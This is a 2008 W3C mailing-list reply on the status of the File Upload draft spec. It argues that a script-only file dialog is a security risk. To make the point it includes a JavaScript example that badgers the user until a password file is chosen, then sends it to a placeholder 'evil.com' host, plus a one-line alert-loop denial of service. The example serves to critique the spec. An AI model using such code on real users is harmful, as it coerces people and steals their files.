Re: File Upload Status ? from Jonas Sicking on 2008-08-08 (public-webapps@w3.org from July to September 2008)

From: Jonas Sicking <jonas@sicking.cc>
Date: Fri, 08 Aug 2008 02:56:09 -0700
To: Garrett Smith <dhtmlkitchen@gmail.com>
Cc: Web Applications Working Group WG <public-webapps@w3.org>
Message-ID: <489C1839.5060309@sicking.cc>

Garrett Smith wrote:
> The File object is useful for uploading files via XHR. It provides
> functionality for data to be retrieved from a file submitted to a
> formusing the input type "file".
> 
> It is currently a Working Draft:
>  http://www.w3.org/TR/file-upload/
>  http://dev.w3.org/2006/webapi/FileUpload/publish/FileUpload.html
> 
> Implemented differently in Firefox 3.
>  http://developer.mozilla.org/en/docs/nsIDOMFile
>  https://bugzilla.mozilla.org/show_bug.cgi?id=371432
> 
> An example in Firefox 3:
> http://dhtmlkitchen.com/ape/example/form/Form.html
> 
> It is a useful feature for in-page file upload, without resorting
> toIFRAME hackery.
> 
> What is the status of File Upload?
> 
> Firefox 3's implementation is different than the w3c working draft.The
> spec author seems to have abandoned that, so now there's a working
> draft which seems to be collecting dust for a couple of years.
> 
> What is going on with File Upload specification? It would be a useful
> feature, but with only a half-legged attempt at a spec that the author
> abandoned, and a different implementation in Firefox 3, other browsers
> probably won't implement this functionality any time soon. It's useful
> in Firefox 3, and would be even better if there were some mime-type
> sniffing (mediaType).
> 
> There seems to be a need for failing test cases,, so implementations
> can fill in the "???"'s. Any other suggestions for getting this thing
> done?

The spec only really supplies one feature over what Firefox 3 has: The 
ability to open a file dialog strictly from Javascript without any UI 
objects involved.

I'm not sure if this is a super desirable feature from a security point 
of view. Technically speaking a site could take a users browser hostage 
unless the user agrees to give up a sensitive file:

function checkForFile(e) {
   if (!e || !fileIsPasswordFile(e.fileList[0])) {
     alert("Give me your passw0rd file!");
     var fd = new FileDialog();
     fd.addEventListenerNS(
       "http://www.w3.org/ns/fs-event#", "files-selected", checkForFile,
        false);
     fd.open();
   }
   else {
     xhr = new XMLHttpRequest();
     xhr.open("GET", "http://evil.com/passwordsaver.cgi", false);
     xhr.send(e.fileList[0]);
   }
}
checkForFile();

Granted, there are certainly many ways to DoS a browser already 
(while(1) alert('ha');) but the above is somewhat more sinister.

/ Jonas

Received on Friday, 8 August 2008 09:57:44 UTC